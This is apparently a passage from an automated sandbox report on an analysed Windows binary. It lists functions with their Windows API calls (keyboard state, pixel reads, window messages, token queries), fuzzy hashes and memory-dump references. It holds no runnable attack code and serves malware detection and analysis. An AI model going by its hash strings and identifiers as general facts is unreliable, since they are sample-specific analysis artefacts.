                                                                  • Opcode Fuzzy Hash: 679874b89a3b5914d61ea43ebfae8ec5d47cdb32d7f8e16578af36cea557e3c9
                                                                  • Instruction Fuzzy Hash: 7B514B35A00109DFCB04EF69C981AADBBF5FF49350B1480A9E949AB362CB31ED50DF51
                                                                  Function 0097A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1e1307e263b8f617bc4ecda40ef2c0e1621cbda75fb94dda6732150c6070c10
                                                                  • Instruction ID: 8ea8faa7bb928b012bd3f0a4eb7e0be0c2f54b9eda2ae15e9cc51c681089f980
                                                                  • Opcode Fuzzy Hash: a1e1307e263b8f617bc4ecda40ef2c0e1621cbda75fb94dda6732150c6070c10
                                                                  • Instruction Fuzzy Hash: 8141D43790C104AFE720DF28CC58FADBBA8EB89321F558665F91DA72E1C7309D41EA51
                                                                  Function 008F2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 008F2357
                                                                  • ScreenToClient.USER32(009B57B0,?), ref: 008F2374
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 008F2399
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 008F23A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: bec44b15a84be00fc7d2de5b1efbe3edf456cf65d1b690718da33360e30572de
                                                                  • Instruction ID: 6d2add2a03849ee7796e6dbd7a1cb085c4a2c96c323800066519e94cff776ca9
                                                                  • Opcode Fuzzy Hash: bec44b15a84be00fc7d2de5b1efbe3edf456cf65d1b690718da33360e30572de
                                                                  • Instruction Fuzzy Hash: 954171B5608119FBCF159F68C844AFDBB74FB05364F204359F929E22A0CB34A994DB91
                                                                  Function 009463AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009463E7
                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00946433
                                                                  • TranslateMessage.USER32(?), ref: 0094645C
                                                                  • DispatchMessageW.USER32(?), ref: 00946466
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00946475
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                  • String ID:
                                                                  • API String ID: 2108273632-0
                                                                  • Opcode ID: e89029287841946c6e8c198429ed64f5b1491cb709f7ca6bfaaf16983c9e749f
                                                                  • Instruction ID: b741327074ebe99c771a0d7dc0fc8b8682b57c4abf38cc2b5e583c807775256e
                                                                  • Opcode Fuzzy Hash: e89029287841946c6e8c198429ed64f5b1491cb709f7ca6bfaaf16983c9e749f
                                                                  • Instruction Fuzzy Hash: 9131D6B1A14646AFDF64CF74CD44FB67BACAB02310F150269E425C31B0E7259889EB62
                                                                  Function 00948A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00948A30
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00948ADA
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00948AE2
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00948AF0
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00948AF8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 8639c7a6064249487530dd33094721971653e22eb2c4e792654b07b27421138a
                                                                  • Instruction ID: 3d381a8c07b118bae376b0a733deb1aea9951d7adabec9edfcbce3d35bc0e7b6
                                                                  • Opcode Fuzzy Hash: 8639c7a6064249487530dd33094721971653e22eb2c4e792654b07b27421138a
                                                                  • Instruction Fuzzy Hash: 6831C072504219EFDF14CFA8DD4CA9F3BB9EB44325F10862AF929E61D0C7B09954DB90
                                                                  Function 0094B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0094B204
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0094B221
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0094B259
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0094B27F
                                                                  • _wcsstr.LIBCMT ref: 0094B289
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: b9f493af024510f3fd183feb30a093105eceadb8175af30face34549e3603f01
                                                                  • Instruction ID: 7bd5934babe74e2054cb79541bc02d80258ab9e72a1738189258b0dba78f8070
                                                                  • Opcode Fuzzy Hash: b9f493af024510f3fd183feb30a093105eceadb8175af30face34549e3603f01
                                                                  • Instruction Fuzzy Hash: 9A21D7326082087BEB155B759C49F7F7B9CDF99760F004139F809DA1A1EFA5DC90A760
                                                                  Function 0097B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097B192
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0097B1B7
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0097B1CF
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0097B1F8
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00960E90,00000000), ref: 0097B216
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 2294984445-0
                                                                  • Opcode ID: 59d9ee05e3f4d9ac6f1d7a36b89f0f9295cb7b01a6909d292537e0c75d6f9a83
                                                                  • Instruction ID: cbcc44b61f260b505f99a1695dd01985dd4bf12d3502a1135aceb5aa768f611e
                                                                  • Opcode Fuzzy Hash: 59d9ee05e3f4d9ac6f1d7a36b89f0f9295cb7b01a6909d292537e0c75d6f9a83
                                                                  • Instruction Fuzzy Hash: FA219172A28255AFCB109F38DC54B6A37A8FB15321F118B28F93AD71E0D7309850DB90
                                                                  Function 00949307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00949320
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00949352
                                                                  • __itow.LIBCMT ref: 0094936A
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00949392
                                                                  • __itow.LIBCMT ref: 009493A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow$_memmove
                                                                  • String ID:
                                                                  • API String ID: 2983881199-0
                                                                  • Opcode ID: 6c8b7e55ed941e4337ec799b5b17f13955702a5bd91796d971facd2fc2f42412
                                                                  • Instruction ID: 063cefb9b6f0e87ec278905a777b2a82f5d4b3d22d761e985c3ce4c8eff8bf5c
                                                                  • Opcode Fuzzy Hash: 6c8b7e55ed941e4337ec799b5b17f13955702a5bd91796d971facd2fc2f42412
                                                                  • Instruction Fuzzy Hash: A621A731704208ABEB10AE648C99EEF7BADEB8A714F044025FA45E71D1D6B08D459792
                                                                  Function 00965A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 00965A6E
                                                                  • GetForegroundWindow.USER32 ref: 00965A85
                                                                  • GetDC.USER32(00000000), ref: 00965AC1
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00965ACD
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00965B08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: 3b44c0a39e74ed9d73a68ad32b3406ea28ac5e96c969c934b54290ac365b3bfc
                                                                  • Instruction ID: 87ab7ea8b94bb109ea59b032131ae21e757e0f376dbd24c95c7df8ee7405f151
                                                                  • Opcode Fuzzy Hash: 3b44c0a39e74ed9d73a68ad32b3406ea28ac5e96c969c934b54290ac365b3bfc
                                                                  • Instruction Fuzzy Hash: 73218436A04108AFDB14EFA9DC98A6AB7E5EF48350F148479F949D7351CA30AD44DB50
                                                                  Function 008F12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F134D
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F135C
                                                                  • BeginPath.GDI32(?), ref: 008F1373
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F139C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: 393391f4402f48eb4d848999060398ea7f712ea45ac3eefa0022e4935a0107fa
                                                                  • Instruction ID: 8817f4ee7c92ad8434d042e310d870ca3504a53da52e24c6c098387ef64c737a
                                                                  • Opcode Fuzzy Hash: 393391f4402f48eb4d848999060398ea7f712ea45ac3eefa0022e4935a0107fa
                                                                  • Instruction Fuzzy Hash: D0218C31828608EBDF119F25EE087697BA8FB00331F15432AE914E62B0D7759891EF90
                                                                  Function 0094BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 66fe2dfb352457cf4cec2ed16a2b3e7990a19a3f2737ef626ea6dfda89cfd0a1
                                                                  • Instruction ID: 8beac3f90c9aba77e944d80b930b995cc3875a851ef99d2282c0abcea7d5fb39
                                                                  • Opcode Fuzzy Hash: 66fe2dfb352457cf4cec2ed16a2b3e7990a19a3f2737ef626ea6dfda89cfd0a1
                                                                  • Instruction Fuzzy Hash: 7301B1B27001097BD2046B15ADD2FFBB76CDEA178CF044426FE4596382EB64EE1182A0
                                                                  Function 00954A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00954ABA
                                                                  • __beginthreadex.LIBCMT ref: 00954AD8
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00954AED
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00954B03
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00954B0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 3824534824-0
                                                                  • Opcode ID: 32517517c066fbdd912613c46464d6b8d75ae9a8f5953581233e24a9977dc325
                                                                  • Instruction ID: f19d2670126b29dd2684183eb52d11e3f137663bb724600725bc52d3840b1136
                                                                  • Opcode Fuzzy Hash: 32517517c066fbdd912613c46464d6b8d75ae9a8f5953581233e24a9977dc325
                                                                  • Instruction Fuzzy Hash: F211047691D608BBC740CFA9AC08B9F7FACEB45325F144369FC28E3250D671C98497A0
                                                                  Function 00948202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0094821E
                                                                  • GetLastError.KERNEL32(?,00947CE2,?,?,?), ref: 00948228
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00947CE2,?,?,?), ref: 00948237
                                                                  • HeapAlloc.KERNEL32(00000000,?,00947CE2,?,?,?), ref: 0094823E
                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00948255
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: 8cae5e5579cf3a1ea01510e775bc02f2bcd7c896f57acbc21d07f53e339a55a5
                                                                  • Instruction ID: 6641502e11197b0ade7627b98993f30f38b3c2ae10232d7f27923419408defea
                                                                  • Opcode Fuzzy Hash: 8cae5e5579cf3a1ea01510e775bc02f2bcd7c896f57acbc21d07f53e339a55a5
                                                                  • Instruction Fuzzy Hash: 44016DB2218608BFDB204FA5DC58D6B7BACEF8A794B500429F819E2220DA718C40DA70
                                                                  Function 0094710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?,?,00947455), ref: 00947127
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947142
                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947150
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?), ref: 00947160
                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 0094716C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: 3aa03bcbc69785524f994911b304a1f9be1f291aa975fe04c4c4471255c23674
                                                                  • Instruction ID: f9fb4840058742ed98a1c933716e0267ae6192b218b156e149a457a18cf84fe6
                                                                  • Opcode Fuzzy Hash: 3aa03bcbc69785524f994911b304a1f9be1f291aa975fe04c4c4471255c23674
                                                                  • Instruction Fuzzy Hash: F3018F73619208BBDB114FA4DC44FAEBBADEF48791F140064FD09E2220D731DD80ABA0
                                                                  Function 00955244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00955260
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0095526E
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00955276
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00955280
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 900682cdcc4b33be0b5066d11039f8fe869ac910bbf2e60011964cab867e74b0
                                                                  • Instruction ID: dce8f12a426689a4933a5d886642bb1225ab3f556abb97c4ee8126224ae58544
                                                                  • Opcode Fuzzy Hash: 900682cdcc4b33be0b5066d11039f8fe869ac910bbf2e60011964cab867e74b0
                                                                  • Instruction Fuzzy Hash: 2E015B32D19A1DDBCF00DFE5E8689EDBB78BB08722F410456E955F2141CB305558DBA1
                                                                  Function 0094810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00948121
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0094812B
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0094813A
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00948141
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00948157
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 77e5d595b40604da0303d2d55d84d0bef48579b92a1b8828fee9f5471010e426
